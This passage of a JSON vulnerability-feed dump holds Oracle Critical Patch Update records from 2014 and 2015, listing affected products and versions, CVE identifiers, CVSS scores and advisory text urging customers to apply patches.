"operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Demand Planning", "version": "11.5.10", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "2.3.19", "operator": "le"}, {"name": "XDK and XDB - XML Database", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Installed Base", "version": "12.1.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.41", "operator": "le"}, {"name": "Oracle Commerce Platform", "version": "10.0", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "3.x", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.x", "operator": "le"}, {"name": "Java SE, JRockit", "version": "7u76", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.4", "operator": "le"}, {"name": "PeopleSoft Enterprise Portal Interaction Hub", "version": "9.1.00", "operator": "le"}, {"name": "Oracle Hyperion BI+", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}], "cvelist": ["CVE-2015-2576", "CVE-2015-0489", "CVE-2015-0466", "CVE-2015-0473", "CVE-2015-0455", "CVE-2015-0484", "CVE-2014-3566", "CVE-2015-0504", "CVE-2015-0482", "CVE-2015-0235", "CVE-2015-0493", "CVE-2015-0463", "CVE-2015-2579", "CVE-2015-0474", "CVE-2015-0492", "CVE-2014-7809", "CVE-2015-0495", "CVE-2015-0440", "CVE-2015-2567", "CVE-2014-3572", "CVE-2015-0206", "CVE-2015-0502", "CVE-2015-0477", "CVE-2015-0469", "CVE-2015-2568", "CVE-2015-0506", "CVE-2015-2575", "CVE-2015-0447", "CVE-2014-3571", "CVE-2015-0476", "CVE-2015-0511", "CVE-2015-0458", "CVE-2015-0483", "CVE-2014-0116", "CVE-2015-0487", "CVE-2015-0453", "CVE-2015-2572", "CVE-2015-0490", "CVE-2015-2574", "CVE-2015-0510", "CVE-2015-0497", "CVE-2015-0501", "CVE-2015-0450", "CVE-2015-0439", "CVE-2015-0448", "CVE-2015-0472", "CVE-2015-0462", "CVE-2015-0459", "CVE-2015-0507", "CVE-2015-2571", "CVE-2015-0475", "CVE-2014-8275", "CVE-2015-2570", "CVE-2014-3570", "CVE-2015-0509", "CVE-2015-0494", "CVE-2015-0461", "CVE-2015-0503", "CVE-2015-0449", "CVE-2014-0050", "CVE-2015-0500", "CVE-2015-0405", "CVE-2013-4286", "CVE-2015-0451", "CVE-2015-2577", "CVE-2014-1568", "CVE-2015-0478", "CVE-2015-2565", "CVE-2015-0496", "CVE-2015-0204", "CVE-2014-0094", "CVE-2015-2578", "CVE-2015-2566", "CVE-2015-0460", "CVE-2015-0488", "CVE-2015-0470", "CVE-2015-0471", "CVE-2015-0423", "CVE-2015-0498", "CVE-2014-0113", "CVE-2015-0438", "CVE-2015-0480", "CVE-2015-0499", "CVE-2015-0433", "CVE-2015-0441", "CVE-2015-0486", "CVE-2015-0452", "CVE-2014-0112", "CVE-2015-0508", "CVE-2015-0457", "CVE-2015-0505", "CVE-2015-0465", "CVE-2015-0479", "CVE-2015-2573", "CVE-2015-0205", "CVE-2015-0485", "CVE-2014-3569", "CVE-2015-0464", "CVE-2015-0491", "CVE-2015-0456", "CVE-2013-4545"], "modified": "2015-05-20T00:00:00", "id": "ORACLE:CPUAPR2015-2365600", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:14:02", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are generally cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 113 new security fixes across the product families listed below.\n\nPlease note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\nPlease note that on April 18, 2014, Oracle released a [Security Alert for CVE-2014-0160 OpenSSL \"Heartbleed\"](<http://www.oracle.com/technetwork/topics/security/alert-cve-2014-0160-2190703.html>). This Critical Patch Update includes an update to MySQL Enterprise Server 5.6 and this update includes a fix for vulnerability CVE-2014-0160. Customers of other Oracle products are strongly advised to apply the [fixes ](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) that were announced in the Security Alert for CVE-2014-0160.\n", "edition": 3, "reporter": "Oracle", "published": "2014-07-15T00:00:00", "title": "Oracle Critical Patch Update - July 2014", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Java SE, JRockit", "version": "28.3.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.3", "operator": "le"}, {"name": "Hyperion Enterprise Performance Management Architect", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop (SGD)", "version": "5.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.1", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Virtual Desktop Infrastructure (VDI)", "version": "3.5.1", "operator": "le"}, {"name": "Siebel Travel & Transportation", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.3", "operator": "le"}, {"name": "Java SE, JRockit", "version": "8u5", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "12.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.37", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.1", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "2.1.1", "operator": "le"}, {"name": "RDBMS Core", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Concurrent Processing", "version": "12.2.2", "operator": "le"}, {"name": "Java SE", "version": "7u60", "operator": "le"}, {"name": "Hyperion Analytic Provider Services", "version": "11.1.2.2", "operator": "le"}, {"name": "Solaris", "version": "8", "operator": "le"}, {"name": "Solaris", "version": "2.3.1.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "8.0", "operator": "le"}, {"name": "Solaris", "version": "2.4.2.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Purchasing", "version": "9.2", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.2", "operator": "le"}, {"name": "RDBMS Core", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.0", "operator": "le"}, {"name": "RDBMS Core", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.34", "operator": "le"}, {"name": "Solaris", "version": "11.1", "operator": "le"}, {"name": "Solaris", "version": "2.3.1.1", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.12", "operator": "le"}, {"name": "Hyperion Common Admin", "version": "11.1.2.3", "operator": "le"}, {"name": "Java SE, JRockit", "version": "6u75", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "le"}, {"name": "Oracle Agile Product Collaboration", "version": "9.3.3", "operator": "le"}, {"name": "Siebel Core - Server OM Frwks", "version": "8.1.1", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.2.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.26", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.2", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "11.1.2.4.0", "operator": "le"}, {"name": "Java SE", "version": "8u5", "operator": "le"}, {"name": "Hyperion Common Admin", "version": "11.1.2.2", "operator": "le"}, {"name": "PeopleSoft Enterprise ELS Enterprise Learning Management", "version": "9.2", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.1.3", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Siebel Travel & Transportation", "version": "8.1.1", "operator": "le"}, {"name": "Oracle iStore", "version": "11.5.10.2", "operator": "le"}, {"name": "Java SE", "version": "6u75", "operator": "le"}, {"name": "Hyperion BI+", "version": "11.1.2.3", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "11.5.10.2", "operator": "le"}, {"name": "XML Parser", "version": "12.1.0.1", "operator": "le"}, {"name": "Hyperion Enterprise Performance Management Architect", "version": "11.1.2.3", "operator": "le"}, {"name": "RDBMS Core", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Concurrent Processing", "version": "12.2.3", "operator": "le"}, {"name": "Solaris", "version": "2.4.0.0", "operator": "le"}, {"name": "Solaris", "version": "2.4.1.0", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.2", "operator": "le"}, {"name": "BI Publisher", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Secure Global Desktop (SGD)", "version": "4.63", "operator": "le"}, {"name": "Hyperion BI+", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Concurrent Processing", "version": "12.1.3", "operator": "le"}, {"name": "Solaris", "version": "9", "operator": "le"}, {"name": "Oracle Traffic Director", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "2.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.4", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.2", "operator": "le"}, {"name": "Siebel Core - Server OM Frwks", "version": "8.2.2", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.2.0.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Network Layer", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "14.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.26", "operator": "le"}, {"name": "Oracle iPlanet Web Proxy Server", "version": "4.0.24", "operator": "le"}, {"name": "Oracle WebCenter Portal", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop (SGD)", "version": "4.71", "operator": "le"}, {"name": "PeopleSoft Enterprise ELS Enterprise Learning Management", "version": "9.1", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.1.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.14", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "6.1", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.0.2.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "14.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "12.0.9IN", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.0.6", "operator": "le"}, {"name": "Hyperion Analytic Provider Services", "version": "11.1.2.3", "operator": "le"}, {"name": "Solaris", "version": "2.3.1.2", "operator": "le"}, {"name": "Java SE", "version": "5.0u65", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.3", "operator": "le"}, {"name": "Oracle WebCenter Portal", "version": "11.1.1.7.0", "operator": "le"}, {"name": "PeopleSoft Enterprise PT PeopleTools", "version": "8.52", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "7.0.5.30.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.1", "operator": "le"}, {"name": "Java SE, JRockit", "version": "27.8.2", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "GlassFish Communications Server", "version": "2.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.0", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.2.2", "operator": "le"}, {"name": "Sun Ray Software", "version": "5.4.3", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iStore", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.2", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "8.0", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "7.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.17", "operator": "le"}, {"name": "Oracle WebCenter Portal", "version": "11.1.1.8", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "12.0", "operator": "le"}, {"name": "PeopleSoft Enterprise FIN Install", "version": "9.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.24", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.1.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.15", "operator": "le"}, {"name": "Java SE, JRockit", "version": "7u60", "operator": "le"}, {"name": "Hyperion Essbase", "version": "11.1.2.3", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "11.5.10.2", "operator": "le"}, {"name": "Java SE, JRockit", "version": "5.0u65", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.35", "operator": "le"}, {"name": "Oracle Fusion Middleware", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "12.0.9IN", "operator": "le"}, {"name": "Oracle WebCenter Portal", "version": "11.1.1.7", "operator": "le"}, {"name": "Hyperion Essbase", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.4", "operator": "le"}, {"name": "PeopleSoft Enterprise FIN Install", "version": "9.1", "operator": "le"}, {"name": "Oracle Secure Global Desktop (SGD)", "version": "5.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Purchasing", "version": "9.1", "operator": "le"}], "cvelist": ["CVE-2014-2482", "CVE-2012-3544", "CVE-2014-4224", "CVE-2014-4208", "CVE-2014-4213", "CVE-2014-4262", "CVE-2014-4242", "CVE-2014-2490", "CVE-2014-4226", "CVE-2014-4251", "CVE-2014-4263", "CVE-2014-4238", "CVE-2014-2481", "CVE-2013-3774", "CVE-2014-2480", "CVE-2014-4250", "CVE-2014-4260", "CVE-2014-2479", "CVE-2014-4218", "CVE-2014-4254", "CVE-2014-4258", "CVE-2014-4221", "CVE-2013-6449", "CVE-2014-4255", "CVE-2014-4253", "CVE-2014-4268", "CVE-2013-2172", "CVE-2014-4203", "CVE-2014-4265", "CVE-2014-4231", "CVE-2014-4201", "CVE-2014-4233", "CVE-2013-5855", "CVE-2014-4210", "CVE-2014-4229", "CVE-2013-5605", "CVE-2014-0224", "CVE-2014-4267", "CVE-2014-4266", "CVE-2014-2486", "CVE-2014-4270", "CVE-2014-0098", "CVE-2014-4214", "CVE-2014-2485", "CVE-2014-4222", "CVE-2013-1741", "CVE-2014-4257", "CVE-2014-4244", "CVE-2014-2494", "CVE-2014-2487", "CVE-2014-4205", "CVE-2014-4261", "CVE-2014-0436", "CVE-2013-1740", "CVE-2014-2493", "CVE-2014-4206", "CVE-2014-0099", "CVE-2013-6438", "CVE-2014-3470", "CVE-2014-2488", "CVE-2013-1739", "CVE-2014-4215", "CVE-2014-0119", "CVE-2014-1492", "CVE-2014-4209", "CVE-2013-6450", "CVE-2014-4245", "CVE-2013-5606", "CVE-2014-0114", "CVE-2014-0211", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-2461", "CVE-2014-1490", "CVE-2010-5298", "CVE-2014-0160", "CVE-2013-4286", "CVE-2014-0209", "CVE-2014-0210", "CVE-2014-4234", "CVE-2014-2489", "CVE-2014-0195", "CVE-2014-4269", "CVE-2014-0198", "CVE-2014-4216", "CVE-2014-4230", "CVE-2013-3751", "CVE-2014-4264", "CVE-2014-2477", "CVE-2014-4220", "CVE-2014-4237", "CVE-2014-4204", "CVE-2014-0096", "CVE-2014-4243", "CVE-2014-4217", "CVE-2014-4239", "CVE-2014-4248", "CVE-2014-0075", "CVE-2014-4211", "CVE-2014-2496", "CVE-2014-2483", "CVE-2014-4235", "CVE-2014-0033", "CVE-2014-4225", "CVE-2014-4241", "CVE-2014-4246", "CVE-2014-4207", "CVE-2014-4232", "CVE-2014-4256", "CVE-2014-1491", "CVE-2014-4227", "CVE-2014-4247", "CVE-2014-4252", "CVE-2014-2492", "CVE-2014-4228", "CVE-2014-4202", "CVE-2014-4212", "CVE-2014-2484", "CVE-2014-4236", "CVE-2014-4240", "CVE-2014-4219", "CVE-2014-2456", "CVE-2014-4249", "CVE-2013-1620", "CVE-2014-4223", "CVE-2014-4271", "CVE-2014-0221", "CVE-2014-2491", "CVE-2014-2495"], "modified": "2014-07-24T00:00:00", "id": "ORACLE:CPUJUL2014-1972956", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:13:47", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle has received specific reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply these Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 169 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nPlease note that on October 16, 2014, Oracle released information for [CVE-2014-3566 \"POODLE\"](<http://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2014-3566 in addition to the fixes announced in this CPU.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 3, "reporter": "Oracle", "published": "2015-03-10T00:00:00", "title": "Oracle Critical Patch Update - January 2015", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle HCM Configuration Workbench", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.4.2", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.2", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.2", "operator": "le"}, {"name": "Workspace Manager", "version": "12.1.0.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u72", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.3", "operator": "le"}, {"name": "Java SE", "version": "5.0u75", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.3", "operator": "le"}, {"name": "Workspace Manager", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "8.0", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.20", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.1.0.7", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "27.8.4", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.2.2", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1118", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u85", "operator": "le"}, {"name": "Java SE", "version": "8u25", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.1.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2240", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u71", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "1.x", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "10.1.3.5.0", "operator": "le"}, {"name": "MICROS Retail", "version": "6.0.6", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "11.1.1.7", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.3.", "operator": "le"}, {"name": "Oracle Marketing", "version": "11.5.10.2", "operator": "le"}, {"name": "Java SE", "version": "6u85", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.4", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "3.0.x", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.3", "operator": "le"}, {"name": "Solaris", "version": "11", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.63", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.34", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.2.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.28", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.1.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u25", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "MICROS Retail", "version": "5.5.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.4", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.5", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "10.1.3.4.2", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "10.1.3.4.2", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.2.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.26", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.2.2", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.5.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "28.3.4", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "4.x", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "11.1.1.7", "operator": "le"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.1", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.26", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Containers for J2EE", "version": "10.1.3.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.0.6", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1.4", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.38", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.28", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "3", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "4", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "5.0u75", "operator": 